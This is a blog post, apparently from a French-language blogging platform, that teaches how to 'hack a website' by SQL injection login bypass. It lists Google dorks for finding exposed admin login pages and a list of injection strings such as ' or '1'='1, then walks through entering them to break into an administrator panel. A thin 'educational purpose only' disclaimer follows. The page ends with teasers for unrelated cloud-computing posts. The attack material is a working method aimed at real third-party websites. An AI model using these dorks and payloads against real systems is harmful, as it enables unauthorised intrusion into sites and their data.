How to hack a website using Authentication bypass.


Basic sql injection

Gaining authentication bypass on an admin account.
First we need to find a site, start by opening Google.
Now we have to use Google dork:
There is a large number of Google dork for basic sql injection.
here is the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
"inurl: admin.php"
"inurl: login/admin.php"
"inurl: admin/login.php"
"inurl: adminlogin.php"
"inurl: adminhome.php"
"inurl: admin_login.php"
"inurl: administratorlogin.php"
"inurl: login/administrator.php"
"inurl: administrator_login.php"


Now what to do once we get to our site.
the site should look something like this :

welcome to xxxxxxxxxx administrator panel
username :
password :

so what we do here is in the username we always type "Admin"
and for our password we type our sql injection

here is a list of sql injections

' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'


there are many more but these are the best ones that i know .So your input should look like this

username:Admin
password:'or'1'='1

So click submit and you'r in.
NOTE: All sites are not vulnerable.


Note: Don't use this method for hacking . This article is for educational purpose only.

Commentaires

Enregistrer un commentaire

Posts les plus consultés de ce blog

IBM's Blue Cloud Meets Juniper To Alleviate Cloud Computing Adoption Fears

Security and lack of an acceptable SLA are customers' top adoption fears to move to cloud computing . IBM's recent announcements to further advance their cloud computing initiative known as Blue Cloud should help alleviate these fears to some extent. IBM announced their partnership with Juniper for their hybrid cloud initiative to provide secured private cloud with better SLA. IBM also announced new offerings for the cloud - Tivoli storage as service and a new set of cloud management tools to align with what a typical CIO would look for when migrating to the cloud. In addition IBM is pushing some of their existing offerings on the cloud that customers can now use off Amazon's EC2 on pay-as-you-go subscription model . IBM has been experimenting with the concept of a private cloud for a while. One of such experiments included creating a private virtual cloud inside the firewall to deploy some of the regions of SecondLife with seamless navigation in and out of the firewall....
Lire la suite

Implementation of Cloud Computing Solutions in Federal Agencies : Part 1-Introduction

Image
(This post first appeared on "Cloud Musings on Forbes". This series provides the content of a whitepaper I recently authored. A copy of the complete whitepaper is available at NJVC.com starting September 7, 2011.) Introduction Cloud computing is a new approach in the provisioning and consumption of information technology (IT). While technology is a crucial component, the real value of cloud computing lies in its ability to enable new capabilities or in the execution of current capabilities in more efficient and effective ways. Although the current hype around cloud computing has focused on expected cost savings, the true value is really found in the mission and business enhancements these techniques can provide. When properly deployed, the cloud computing model provides greatly enhanced mission and business capability without a commensurate increase in resource (time, people or money) expenditures. Cloud Computing: Changing the Game The use of commodity components, coupled ...
Lire la suite

Dataline launches SOA-R: Cloud Computing for National Security Applications

Image
Last week, Dataline (my company), in collaboration with IBM , Google , Northrop Grumman , Cisco and Great-Circle Technologies , launched an initiative aimed at integrating an end-to-end solution for secure cloud computing. Called Service Oriented Architecture – Real Time (SOA-R), the goal is to provide the benefits of cloud computing and secure ad-hoc mobility in a modular, standards-based implementation framework to public sector organizations. By exploiting the advantages of a service oriented approach, web services and interfaces specific to the national security business domain are being developed and enhanced for deployment from and interface with a cloud computing infrastructure. By doing this, Dataline, in concert with its partners, looks to provide leading edge solutions without the risk typically associated with early adoption of leading edge technologies. Like cloud computing, SOA-R has dual meanings. Whereas cloud computing refers to both a platform and type of application...
Lire la suite